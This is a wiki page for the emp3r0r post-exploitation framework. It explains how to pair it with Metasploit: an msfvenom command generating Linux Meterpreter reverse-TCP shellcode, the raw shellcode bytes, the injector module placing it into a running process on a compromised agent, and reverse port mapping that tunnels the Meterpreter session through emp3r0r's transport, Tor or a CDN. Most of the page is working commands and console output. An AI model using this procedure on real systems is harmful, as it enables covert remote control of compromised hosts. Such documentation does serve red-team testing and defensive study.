Interoperability with metasploit and other C2 frameworks

jm33-m0 edited this page Jan 12, 2021 · 2 revisions

Shellcode loading

Generate and format shellcode

Taking Metasploit as an example, you can generate a (staged) Meterpreter shellcode with the following command:

$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o shellcode.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Saved as: shellcode.bin

Note that we use 127.0.0.1 as the C2 address: the shellcode connects to 127.0.0.1:4444 on the agent host, where emp3r0r's reverse port mapping (described below) listens and forwards the connection to Metasploit. This way the Meterpreter session is encapsulated inside emp3r0r's transport.

To format this shellcode for emp3r0r:

$ xxd -i shellcode.bin | grep 0x | tr -d '[:space:]' | tr -d ',' | sed 's/0x/\\x/g' | tee shellcode.txt
\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x11\x5c\x7f\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6

Save shellcode.txt under /tmp/emp3r0r/www before using the injector module.

Run shellcode loader in emp3r0r

2021/01/12 16:27:02
[0] Knock.. Knock...
d5966a56 from 192.168.122.40:51306 - HTTP2 (https://192.168.122.1), running 'CentOS Linux 7 (Core) 7'

emp3r0r > use injector
Using module 'injector'

emp3r0r (injector) > set method native

emp3r0r (injector) > target 0

emp3r0r (injector) > info
Option          Value
======          =====

pid             0
method          native
module          injector
target          0

emp3r0r (injector) > run
2021/01/12 16:27:25 Please wait...
2021/01/12 16:27:25 The shellcode will live in `sleep` process, you will get notified when it exits

2021/01/12 16:38:32
[0] !inject native 0:
native has successfully injected shellcode into target process

emp3r0r (injector) >

Reverse port mapping

Understand how it works

Here is a diagram:

metasploit C2 --> emp3r0r C2 ---> agent

The Metasploit C2's listening port is mapped onto the agent, which makes it reachable from every emp3r0r agent under the emp3r0r C2's control.

If your emp3r0r C2 uses a different transport such as Tor or a CDN, your Meterpreter traffic goes through that transport as well, and agents without internet access can still reach the Metasploit C2 through emp3r0r's auto-proxy feature.

Set up port mapping in emp3r0r

Assuming Metasploit is listening on 192.168.122.87:4444 and we want it available on the agent as 0.0.0.0:4444:

emp3r0r (injector) > use port_fwd
Using module 'port_fwd'

emp3r0r (port_fwd) > set switch reverse

emp3r0r (port_fwd) > set to 192.168.122.87:4444

emp3r0r (port_fwd) > set listen_port 4444

emp3r0r (port_fwd) > target 0

emp3r0r (port_fwd) > info
Option          Value
======          =====

module          port_fwd
target          0
to              192.168.122.87:4444
listen_port     4444
switch          reverse

emp3r0r (port_fwd) > run

Load shellcode

This is the same procedure as in "Run shellcode loader in emp3r0r" above; the only difference is that the reverse port mapping must already be running so the shellcode's connection to 127.0.0.1:4444 is forwarded to Metasploit.